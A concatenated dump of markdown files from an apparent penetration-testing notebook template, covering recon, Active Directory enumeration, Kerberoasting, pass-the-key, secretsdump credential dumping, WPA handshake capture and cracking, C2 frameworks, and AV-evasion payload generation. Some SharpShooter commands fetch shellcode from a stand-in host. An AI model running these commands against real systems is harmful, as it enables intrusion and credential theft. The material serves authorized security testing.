pip3 install -r requirements.txt 6 | 7 | # Generating Payloads 8 | 9 | ## Main Logic: 10 | 11 | ``` 12 | generate payload= lhost= [ obfuscate encode ] 13 | ``` 14 | 15 | - 16 | 17 | ## Session Defender 18 | Villain has a function that inspects user issued shell commands for input that may cause a backdoor shell session to hang (e.g., unclosed single/double quotes or backticks, commands that may start a new interactive session within the current shell and more). Use the `cmdinspector` command to turn that feature on/off. 
19 | 20 | Usage: 21 | ``` 22 | cmdinspector 23 | ``` -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/2. C2 Frameworks.md: -------------------------------------------------------------------------------- 1 | ## Empire C2: 2 | 3 | Github: https://github.com/BC-SECURITY/Empire 4 | 5 | In Kali Linux: 6 | 7 | apt install powershell-empire 8 | 9 | Install Empire Manually: 10 | 11 | 1. cd /Empire/setup 12 | 2. ./install.sh 13 | 14 | - Current Listeners: 15 | 16 | (Empire) > listeners 17 | [!] No listeners currently active 18 | (Empire: listeners) > uselistener 19 | dbx http http_com http_foreign http_hop http_mapi meterpreter onedrive redirector 20 | 21 | 22 | ## Covenant 23 | 24 | Source: https://github.com/cobbr/Covenant 25 | 26 | Installation on Kali: 27 | 28 | 1. apt install dotnet-sdk-2.2 29 | 2. git clone --recurse-submodules https://github.com/cobbr/Covenant 30 | 3. cd Covenant/Covenant 31 | 4. dotnet build 32 | 5. dotnet run 33 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Rubeus.md: -------------------------------------------------------------------------------- 1 | # Source 2 | 3 | - https://github.com/GhostPack/Rubeus 4 | 5 | Review the opsec notes before compiling the program in visual studio. 
6 | 7 | ## ASREProasting: 8 | 9 | chek for users in the current domain: 10 | 11 | - Rubeus.exe asreproast /format: /outfile: 12 | 13 | ## Kerberoasting: 14 | 15 | - Rubeus.exe kerberoast /outfile: 16 | 17 | - Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] 18 | 19 | ## Pass the key (PTK): 20 | 21 | - .\Rubeus.exe asktgt /domain: /user: /rc4: /ptt 22 | 23 | 24 | ## Using the ticket on a Windows target: 25 | 26 | - Rubeus.exe ptt /ticket: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Rubeus.md: -------------------------------------------------------------------------------- 1 | # Source 2 | 3 | - https://github.com/GhostPack/Rubeus 4 | 5 | Review the opsec notes before compiling the program in visual studio. 6 | 7 | ## ASREProasting: 8 | 9 | chek for users in the current domain: 10 | 11 | - Rubeus.exe asreproast /format: /outfile: 12 | 13 | ## Kerberoasting: 14 | 15 | - Rubeus.exe kerberoast /outfile: 16 | 17 | - Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] 18 | 19 | ## Pass the key (PTK): 20 | 21 | - .\Rubeus.exe asktgt /domain: /user: /rc4: /ptt 22 | 23 | 24 | ## Using the ticket on a Windows target: 25 | 26 | - Rubeus.exe ptt /ticket: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Rubeus.md: -------------------------------------------------------------------------------- 1 | # Source 2 | 3 | - https://github.com/GhostPack/Rubeus 4 | 5 | Review the opsec notes before compiling the program in visual studio. 
6 | 7 | ## ASREProasting: 8 | 9 | chek for users in the current domain: 10 | 11 | - Rubeus.exe asreproast /format: /outfile: 12 | 13 | ## Kerberoasting: 14 | 15 | - Rubeus.exe kerberoast /outfile: 16 | 17 | - Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] 18 | 19 | ## Pass the key (PTK): 20 | 21 | - .\Rubeus.exe asktgt /domain: /user: /rc4: /ptt 22 | 23 | 24 | ## Using the ticket on a Windows target: 25 | 26 | - Rubeus.exe ptt /ticket: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | ## What does the targets network look like: 2 | 3 | - /sbin/ifconfig -a 4 | - /sbin/ip addr 5 | - cat /etc/network/interfaces 6 | - cat /etc/sysconfig/network 7 | - ip addr show 8 | 9 | ## Network configuration Settings: 10 | 11 | - cat /etc/resolv.conf 12 | - cat /etc/sysconfig/network 13 | - cat /etc/networks 14 | - iptables -L 15 | - hostname 16 | - dnsdomainname 17 | 18 | ## List all current connections 19 | 20 | - lsof -i 21 | - lsof -i :80 22 | - grep 80 /etc/services 23 | - netstat -antup 24 | - netstat -antpx 25 | - netstat -tulpn 26 | - chkconfig --list 27 | - chkconfig --list | grep 3:on 28 | 29 | ## Check the routes: 30 | 31 | - arp -e 32 | - route 33 | - route -n 34 | - /sbin/route -nee 35 | - ip route list 36 | 37 | References: 38 | 39 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. 
Cracking Hashes Offline/Wordlists.md: -------------------------------------------------------------------------------- 1 | ## Local in Kali: 2 | 3 | /usr/share/wordlists 4 | 5 | ## Other Resources: 6 | 7 | Have I been Pwned 8 | 9 | - https://haveibeenpwned.com/Passwords 10 | 11 | Seclists: 12 | 13 | - In Kali: apt install seclists 14 | - Usernames: https://github.com/danielmiessler/SecLists/tree/master/Usernames 15 | - Passwords: https://github.com/danielmiessler/SecLists/tree/master/Passwords 16 | 17 | Crackstation's Dictionary List: 18 | 19 | - https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm 20 | 21 | Rainbow Tables (Rainbow Crack): 22 | 23 | - http://project-rainbowcrack.com/table.htm 24 | 25 | Rocktastic Mega Wordlist: 26 | 27 | - https://labs.nettitude.com/tools/rocktastic/ 28 | 29 | Tools to make your own wordlists: 30 | 31 | - Crunch 32 | - Cewl -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/Tips for Writing a Report.md: -------------------------------------------------------------------------------- 1 | 1. Understand who is going to be reading this and who is the target audience? 2 | 2. The report needs to clear that a non-technical person would understand 3 | 3. Report should include the following: 4 | 1. Executive Summary 5 | 2. Technical Summary 6 | 3. Detail Report of findings 7 | 4. Include references from MITRE ATT&CK (https://attack.mitre.org/) 8 | 5. 
Recommendations for remediation (If possible) 9 | 10 | 11 | 12 | 13 | Resources: 14 | 15 | - https://blog.zsec.uk/ltr101-pentest-reporting/ 16 | - 17 | 18 | Public Pentesting Reports: 19 | 20 | - https://github.com/juliocesarfort/public-pentesting-reports 21 | - https://www.hackthebox.com/storage/press/samplereport/sample-penetration-testing-report-template.pdf 22 | - https://www.offsec.com/pwk-online/OSCP-Exam-Report.docx -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Other Scanners.md: -------------------------------------------------------------------------------- 1 | # Unicornscan: 2 | - unicornscan -mU -p ,161,162,137,123,138,1434,445,135,67,68,53,139,500,637,162,69 3 | 4 | # Netcat 5 | ``` 6 | #!/bin/bash 7 | for i in {0..255}; do 8 | for j in {0..255};do 9 | for k in {0..65535};do 10 | nc -v -z -n -w 1 10.100.${i}.${j} ${k} >> nc_port_scan.txt 11 | done 12 | done 13 | done 14 | ``` 15 | 16 | # Naabu 17 | 18 | Source: https://github.com/projectdiscovery/naabu 19 | 20 | ## Installing Naabu: 21 | 22 | Latest: 23 | go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest 24 | 25 | In Kali Linux: 26 | sudo apt install naabu 27 | 28 | ## Using Naabu: 29 | - naabu -host megacorpone.com 30 | - naabu -p 80,443,21-23,u:53 -host megacorpone.com 31 | - naabu -p - -exclude-ports 80,443 -host megacorpone.com 32 | - naabu -host megacorpone.com -json -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/2. C2 Frameworks.md: -------------------------------------------------------------------------------- 1 | ## Empire C2: 2 | 3 | Github: https://github.com/BC-SECURITY/Empire 4 | 5 | In Kali Linux: 6 | 7 | apt install powershell-empire 8 | 9 | Install Empire Manually: 10 | 11 | 1. cd /Empire/setup 12 | 2. 
./install.sh 13 | 14 | - Current Listeners: 15 | 16 | (Empire) > listeners 17 | [!] No listeners currently active 18 | (Empire: listeners) > uselistener 19 | dbx http http_com http_foreign http_hop http_mapi meterpreter onedrive redirector 20 | 21 | 22 | ## Covenant 23 | 24 | Source: https://github.com/cobbr/Covenant 25 | 26 | In Kali Repo: 27 | 28 | sudo apt install covenant-kbx 29 | 30 | Installing manually on Kali: 31 | 32 | 1. apt install dotnet-sdk-2.2 33 | 2. git clone --recurse-submodules https://github.com/cobbr/Covenant 34 | 3. cd Covenant/Covenant 35 | 4. dotnet build 36 | 5. dotnet run 37 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md: -------------------------------------------------------------------------------- 1 | # Note: Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy. 2 | 3 | 4 | Anonymous Credential LDAP Dumping: 5 | 6 | - ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)’ 7 | 8 | Impacket GetADUsers.py (Must have valid credentials) 9 | 10 | - GetADUsers.py -all -dc-ip 11 | 12 | Impacket lookupsid.py: 13 | 14 | - /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0 15 | 16 | Windapsearch: 17 | 18 | https://github.com/ropnop/windapsearch 19 | 20 | - python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U 21 | 22 | ## References: 23 | 24 | - PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/5. 
FTP/General Notes.md: -------------------------------------------------------------------------------- 1 | # FTP Enumeration Tools 2 | 3 | ### Nmap Enumeration 4 | ``` 5 | $ ls -lh /usr/share/nmap/scripts/ | grep ftp 6 | -rw-r--r-- 1 root root 4.5K Oct 12 09:29 ftp-anon.nse 7 | -rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-bounce.nse 8 | -rw-r--r-- 1 root root 3.1K Oct 12 09:29 ftp-brute.nse 9 | -rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-libopie.nse 10 | -rw-r--r-- 1 root root 3.3K Oct 12 09:29 ftp-proftpd-backdoor.nse 11 | -rw-r--r-- 1 root root 3.7K Oct 12 09:29 ftp-syst.nse 12 | -rw-r--r-- 1 root root 5.9K Oct 12 09:29 ftp-vsftpd-backdoor.nse 13 | -rw-r--r-- 1 root root 5.8K Oct 12 09:29 ftp-vuln-cve2010-4221.nse 14 | -rw-r--r-- 1 root root 5.7K Oct 12 09:29 tftp-enum.nse 15 | $ nmap x.x.x.x -p 21 -sV --script=exampleScript1.nse,exampleScript2.nse 16 | ``` 17 | ### Manual Connection 18 | ``` 19 | $ ftp x.x.x.x 20 | ``` 21 | ``` 22 | $ nc x.x.x. 21 23 | ``` 24 | ### Connect via Browser 25 | ``` 26 | ftp://x.x.x.x 27 | ``` -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. 
Cracking Hashes Offline/Wordlists.md: -------------------------------------------------------------------------------- 1 | ## Local in Kali: 2 | 3 | /usr/share/wordlists 4 | 5 | ## Other Resources: 6 | 7 | Have I been Pwned 8 | 9 | - https://haveibeenpwned.com/Passwords 10 | 11 | Seclists: 12 | 13 | - In Kali: apt install seclists 14 | - Usernames: https://github.com/danielmiessler/SecLists/tree/master/Usernames 15 | - Passwords: https://github.com/danielmiessler/SecLists/tree/master/Passwords 16 | 17 | Crackstation's Dictionary List: 18 | 19 | - https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm 20 | 21 | Rainbow Tables (Rainbow Crack): 22 | 23 | - http://project-rainbowcrack.com/table.htm 24 | 25 | Rocktastic Mega Wordlist: 26 | 27 | - https://labs.nettitude.com/tools/rocktastic/ 28 | 29 | berzerk0 wordlist: 30 | 31 | - https://www.hack3r.com/forum-topic/wikipedia-wordlist 32 | 33 | Weakpass: 34 | 35 | - https://www.hack3r.com/forum-topic/wikipedia-wordlist 36 | 37 | Tools to make your own wordlists: 38 | 39 | - Crunch 40 | - Cewl -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. 
Cracking Hashes Offline/Wordlists.md: -------------------------------------------------------------------------------- 1 | ## Local in Kali: 2 | 3 | /usr/share/wordlists 4 | 5 | ## Other Resources: 6 | 7 | Have I been Pwned 8 | 9 | - https://haveibeenpwned.com/Passwords 10 | 11 | Seclists: 12 | 13 | - In Kali: apt install seclists 14 | - Usernames: https://github.com/danielmiessler/SecLists/tree/master/Usernames 15 | - Passwords: https://github.com/danielmiessler/SecLists/tree/master/Passwords 16 | 17 | Crackstation's Dictionary List: 18 | 19 | - https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm 20 | 21 | Rainbow Tables (Rainbow Crack): 22 | 23 | - http://project-rainbowcrack.com/table.htm 24 | 25 | Rocktastic Mega Wordlist: 26 | 27 | - https://labs.nettitude.com/tools/rocktastic/ 28 | 29 | berzerk0 wordlist: 30 | 31 | - https://www.hack3r.com/forum-topic/wikipedia-wordlist 32 | 33 | Weakpass: 34 | 35 | - https://www.hack3r.com/forum-topic/wikipedia-wordlist 36 | 37 | Tools to make your own wordlists: 38 | 39 | - Crunch 40 | - Cewl -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/General Information.md: -------------------------------------------------------------------------------- 1 | Created by TJ Null: 2 | 3 | Twitter: https://twitter.com/TJ_Null 4 | Github: https://github.com/tjnull 5 | 6 | Contribution: 7 | 8 | If you would like to contribute to the template or provide suggestions, then you can submit an issue on the Github Repo here: 9 | - https://github.com/tjnull/TJ-JPT 10 | 11 | ## Changelog: 12 | 13 | v1.0: Original Template 14 | 15 | v2.0 16 | 17 | 2. 
Enumeration 18 | - Added an FTP Notebook to include notes for that identified service 19 | - Added more content in Active Directory 20 | - Web has a subnotebook to include any content from the changelog.txt file 21 | - Fixed the gobuster oneliners to match with the recent changes from the tool 22 | 23 | 3. Exploitation 24 | - Added some custom options for searchsploit 25 | 26 | 4. Post Exploitation 27 | - Moved the subnotebook into a subnotebook (Target #1) so the user can copy the subnotebook and add another one under post exploitation for other targets. 28 | - Created a sub notebook to include the output from automated priv esc scripts that are used. 29 | - Included tools, tips, and resources in all sections for priv esc -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md: -------------------------------------------------------------------------------- 1 | # Note: Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy. 
2 | 3 | 4 | Anonymous Credential LDAP Dumping: 5 | 6 | - ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)’ 7 | 8 | Impacket GetADUsers.py (Must have valid credentials) 9 | 10 | - GetADUsers.py -all -dc-ip 11 | 12 | Impacket lookupsid.py: 13 | 14 | - /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0 15 | 16 | Impacket Secretdump: 17 | 18 | python3 secretdump.py 'breakme.local/Administrator@172.21.0.0' -just-dc-user anakin 19 | 20 | Windapsearch: 21 | 22 | https://github.com/ropnop/windapsearch 23 | 24 | - python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U 25 | 26 | 27 | 28 | ## References: 29 | 30 | - PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise 31 | 32 | - Attacking Active Directory: 0 to 0.9: 33 | https://zer1t0.gitlab.io/posts/attacking_ad/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. 
Exploitation/Bypassing AV.md: -------------------------------------------------------------------------------- 1 | ## Veil Framework: 2 | 3 | Install on Kali: 4 | - apt install veil 5 | - /usr/share/veil/config/setup.sh --force --silent 6 | 7 | Reference: https://github.com/Veil-Framework/Veil 8 | 9 | ## Shellter 10 | 11 | Source: https://www.shellterproject.com/download/ 12 | 13 | - apt install shellter 14 | 15 | 16 | ## Sharpshooter 17 | 18 | Javascript Payload Stageless: 19 | - SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3 20 | 21 | Stageless HTA Payload: 22 | 23 | - SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee 24 | 25 | Staged VBS: 26 | 27 | - SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4 28 | 29 | Reference: https://github.com/mdsecactivebreach/SharpShooter 30 | 31 | ## Donut: 32 | 33 | Source: https://github.com/TheWover/donut 34 | 35 | ## Vulcan 36 | 37 | Source: https://github.com/praetorian-code/vulcan 38 | 39 | 40 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/John The Ripper.md: -------------------------------------------------------------------------------- 1 | DICTIONARY ATTACK 2 | - john --format=#type --wordlist=dict.txt hash.txt 3 | 4 | BRUTEFORCE ATTACK 5 | - john --format=#type hash. 
txt 6 | 7 | MASK ATTACK 8 | - john --format=#type --mask=?l?l?l?l?l?l hash.txt -min-len=6 9 | 10 | INCREMENTAL ATTACK 11 | - john --incremental hash.txt 12 | 13 | DICTIONARY + RULES ATTACK 14 | - john --format=#type --wordlist=dict.t 15 | 16 | 17 | Other Notes: 18 | 19 | BENCHMARK TEST 20 | - john --test 21 | 22 | SESSION NAME 23 | - john hash.txt --session=example_name 24 | 25 | SESSION RESTORE 26 | - john --restore=example_name 27 | 28 | SHOW CRACKED RESULTS 29 | - john hash.txt --pot= --show 30 | 31 | WORDLIST GENERATION 32 | - john --wordlist=dict.txt --stdout --external:[filter name] > out.txt 33 | 34 | CRACKING SSH KEYS: 35 | 36 | - /usr/share/john/ssh2john.py id_rsa > hash.john 37 | - john --wordlist=/usr/share/wordlists/rockyou.txt hash.john 38 | 39 | CRACKING KRB5TGS KEYS 40 | 41 | - john --format=krb5tgs --wordlist= --show 30 | 31 | WORDLIST GENERATION 32 | - john --wordlist=dict.txt --stdout --external:[filter name] > out.txt 33 | 34 | CRACKING SSH KEYS: 35 | 36 | - /usr/share/john/ssh2john.py id_rsa > hash.john 37 | - john --wordlist=/usr/share/wordlists/rockyou.txt hash.john 38 | 39 | CRACKING KRB5TGS KEYS 40 | 41 | - john --format=krb5tgs --wordlist= --show 30 | 31 | WORDLIST GENERATION 32 | - john --wordlist=dict.txt --stdout --external:[filter name] > out.txt 33 | 34 | CRACKING SSH KEYS: 35 | 36 | - /usr/share/john/ssh2john.py id_rsa > hash.john 37 | - john --wordlist=/usr/share/wordlists/rockyou.txt hash.john 38 | 39 | CRACKING KRB5TGS KEYS 40 | 41 | - john --format=krb5tgs --wordlist= -format hashcat/john 4 | 5 | ## GetUserSPNs 6 | 7 | ASREPRoast: 8 | - impacket-GetUserSPNs /: -request -format -outputfile 9 | - impacket-GetUserSPNs / -usersfile -format -outputfile 10 | 11 | Kerberoasting: 12 | - impacket-GetUserSPNs /: -outputfile 13 | 14 | Overpass The Hash/Pass The Key (PTK): 15 | - python3 getTGT.py / -hashes [lm_hash]: 16 | - python3 getTGT.py / -aesKey 17 | - python3 getTGT.py /:[password] 18 | 19 | ## Using TGT key to excute remote commands 
from the following impacket scripts: 20 | 21 | - python3 psexec.py /@ -k -no-pass 22 | - python3 smbexec.py /@ -k -no-pass 23 | - python3 wmiexec.py /@ -k -no-pass 24 | 25 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket Kerberoasting.md: -------------------------------------------------------------------------------- 1 | ## Check for Kerberoasting: 2 | 3 | - GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip -format hashcat/john 4 | 5 | ## GetUserSPNs 6 | 7 | ASREPRoast: 8 | - impacket-GetUserSPNs /: -request -format -outputfile 9 | - impacket-GetUserSPNs / -usersfile -format -outputfile 10 | 11 | Kerberoasting: 12 | - impacket-GetUserSPNs /: -outputfile 13 | 14 | Overpass The Hash/Pass The Key (PTK): 15 | - python3 getTGT.py / -hashes [lm_hash]: 16 | - python3 getTGT.py / -aesKey 17 | - python3 getTGT.py /:[password] 18 | 19 | ## Using TGT key to excute remote commands from the following impacket scripts: 20 | 21 | - python3 psexec.py /@ -k -no-pass 22 | - python3 smbexec.py /@ -k -no-pass 23 | - python3 wmiexec.py /@ -k -no-pass 24 | 25 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Searchsploit.md: -------------------------------------------------------------------------------- 1 | ## Installing searchsploit (Already in Kali) 2 | 3 | - apt update && apt install exploitdb 4 | 5 | ## Install binsploits 6 | Note: bin-sploits contains a set of compiled binaries that are tied to exploits in the exploitdb database. Installing this package will take some time depending on your network connection. 
7 | 8 | - apt update && apt install exploitdb-bin-sploits 9 | 10 | ## updating searchsploit 11 | 12 | - searchsploit -u 13 | 14 | ## Basic Searching: 15 | 16 | - searchsploit etc 17 | - searchsploit -t php windows 18 | 19 | ## Exclude unwanted results 20 | - searchsploit linux kernel 5.2 --exclude="Poc" 21 | 22 | ## View exploits from Searchsploit 23 | - searchsploit 9542 --examine 24 | - searchsploit -x window/remote/42031.py 25 | 26 | 27 | ## Copy exploit to current working directory 28 | - searchsploit -m 29 | 30 | ## Access Exploits from Exploit-DB website: 31 | - searchsploit vsftpd 2.3.4 -w 32 | 33 | ## Run an nmap scan result through searchsploit: 34 | 1. Nmap -Pn 172.21.0.0 -oX results.xml 35 | 2. searchsploit -x --nmap results.xml 36 | 37 | Referneces: 38 | 39 | - https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md: -------------------------------------------------------------------------------- 1 | ## Capture Handshake 2 | 3 | 1. airmon-ng start wlan0 4 | 2. airodump-ng mon0 --write capture.cap -c 11 5 | 3. 
aireplay-ng --deauth 0 -a bb:bb:bb:bb:bb:bb mon0 6 | 7 | Convert pcap files for john and hashcat 8 | 9 | /usr/lib/hashcat-utils/cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid] 10 | /usr/sbin/hccap2john 11 | /usr/sbin/vncpcap2john 12 | /usr/sbin/wpapcap2john 13 | 14 | 15 | ## Cracking Handshake with Aircrack 16 | 17 | - aircrack-ng -w /usr/share/wordlist/fasttrack.txt 0001.cap 18 | 19 | ## Cracking Handshakes with Hashcat 20 | 21 | - hashcat.exe -m 2500 capture.hccapx rockyou.txt (Dictionary Attack) 22 | - hashcat.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d (Brute-Force) 23 | - hashcat.exe -m 2500 -r rules/best64.rule capture.hccapx rockyou.txt (Rule-Based) 24 | 25 | ## Cracking Handshakes with John The Ripper 26 | 27 | Did you run hccap2john? 28 | 29 | - john --format=wpapsk --wordlist=/usr/share/wordlists/rockyou.txt crackmecap 30 | - john --format=wpapsk-opencl --wordlist=/usr/share/wordlists/rockyou.txt crackmecap 31 | 32 | 33 | 34 | Other Resources: 35 | 36 | https://github.com/lgandx/PCredz -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. 
Enumeration Notes/Impacket Kerberoasting.md: -------------------------------------------------------------------------------- 1 | ## Check for Kerberoasting: 2 | 3 | - GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip -format hashcat/john 4 | 5 | ## GetUserSPNs 6 | 7 | ASREPRoast: 8 | - impacket-GetUserSPNs /: -request -format -outputfile 9 | - impacket-GetUserSPNs / -usersfile -format -outputfile 10 | 11 | Kerberoasting: 12 | - impacket-GetUserSPNs /: -outputfile 13 | 14 | Overpass The Hash/Pass The Key (PTK): 15 | - python3 getTGT.py / -hashes [lm_hash]: 16 | - python3 getTGT.py / -aesKey 17 | - python3 getTGT.py /:[password] 18 | 19 | ## Using TGT key to excute remote commands from the following impacket scripts: 20 | 21 | - python3 psexec.py /@ -k -no-pass 22 | - python3 smbexec.py /@ -k -no-pass 23 | - python3 wmiexec.py /@ -k -no-pass 24 | 25 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Searchsploit.md: -------------------------------------------------------------------------------- 1 | ## Installing searchsploit (Already in Kali) 2 | 3 | - apt update && apt install exploitdb 4 | 5 | ## Install binsploits 6 | Note: bin-sploits contains a set of compiled binaries that are tied to exploits in the exploitdb database. Installing this package will take some time depending on your network connection. 
7 | 8 | - apt update && apt install exploitdb-bin-sploits 9 | 10 | ## updating searchsploit 11 | 12 | - searchsploit -u 13 | 14 | ## Basic Searching: 15 | 16 | - searchsploit etc 17 | - searchsploit -t php windows 18 | 19 | ## Exclude unwanted results 20 | - searchsploit linux kernel 5.2 --exclude="Poc" 21 | 22 | ## View exploits from Searchsploit 23 | - searchsploit 9542 --examine 24 | - searchsploit -x window/remote/42031.py 25 | 26 | 27 | ## Copy exploit to current working directory 28 | - searchsploit -m 29 | 30 | ## Access Exploits from Exploit-DB website: 31 | - searchsploit vsftpd 2.3.4 -w 32 | 33 | ## Run an nmap scan result through searchsploit: 34 | 1. Nmap -Pn 172.21.0.0 -oX results.xml 35 | 2. searchsploit -x --nmap results.xml 36 | 37 | Referneces: 38 | 39 | - https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/3. Active Directory (AD)/General Notes.md: -------------------------------------------------------------------------------- 1 | # Note: Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy. 

# Anonymous Credential LDAP Dumping:

- ldapsearch -LLL -x -H ldap:// -b '' -s base '(objectclass=*)'

Impacket GetADUsers.py (must have valid credentials):

- GetADUsers.py -all -dc-ip

Impacket lookupsid.py:

- /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0

Impacket secretsdump.py:

- python3 secretsdump.py 'breakme.local/Administrator@172.21.0.0' -just-dc-user anakin

Windapsearch:

https://github.com/ropnop/windapsearch

- python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U

Crackmapexec:

- cme ldap -u "" -p "" -d
- cme ldap -u "Guest" -p "" -d

## References:

- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise
- Attacking Active Directory: 0 to 0.9: https://zer1t0.gitlab.io/posts/attacking_ad/
--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Masscan.md:
--------------------------------------------------------------------------------
## Scanning targets
- masscan 172.21.10.0
- masscan 172.21.10.0/24 172.21.0.0/16
- masscan 172.21.10.0/24 --excludeFile
- masscan 172.21.10.0/24 --exclude 172.21.10.254

## Scanning for services:
- masscan 172.21.10.1 -p 80
- masscan 172.21.10.1 -p 0-65535
- masscan 172.21.10.1 -p 80,443
- masscan 172.21.10.0/24 -p 0-65535 --rate 1000000 --open-only --http-user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" -oL output.txt

## UDP Scan
- masscan 172.21.10.1 -pU:53

## Report only open ports
- masscan 10.0.0.1 --open-only

# Other Options
## Offline Mode (reviews how fast the program runs without the transmit overhead)
- masscan 0.0.0.0/24 --offline

## Obtaining Service banners:
- masscan 172.21.10.1 --banners

## Set masscan to use a source IP
- masscan 10.0.0.1 --source-ip 192.168.1.200

## Change the default user agent
- masscan 10.0.0.1 --http-user-agent

## Save sent packets in a PCAP
- masscan 10.0.0.1 --pcap

# References:

- https://github.com/robertdavidgraham/masscan
- https://danielmiessler.com/study/masscan/

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Transferring Files.md:
--------------------------------------------------------------------------------
# Services to Host Files on your System:

General Options:

FTP:

Install pyftpdlib
- pip3 install pyftpdlib

Pure-ftpd
- sudo apt install pure-ftpd
- service pure-ftpd start

Run (the -w flag allows anonymous write access)
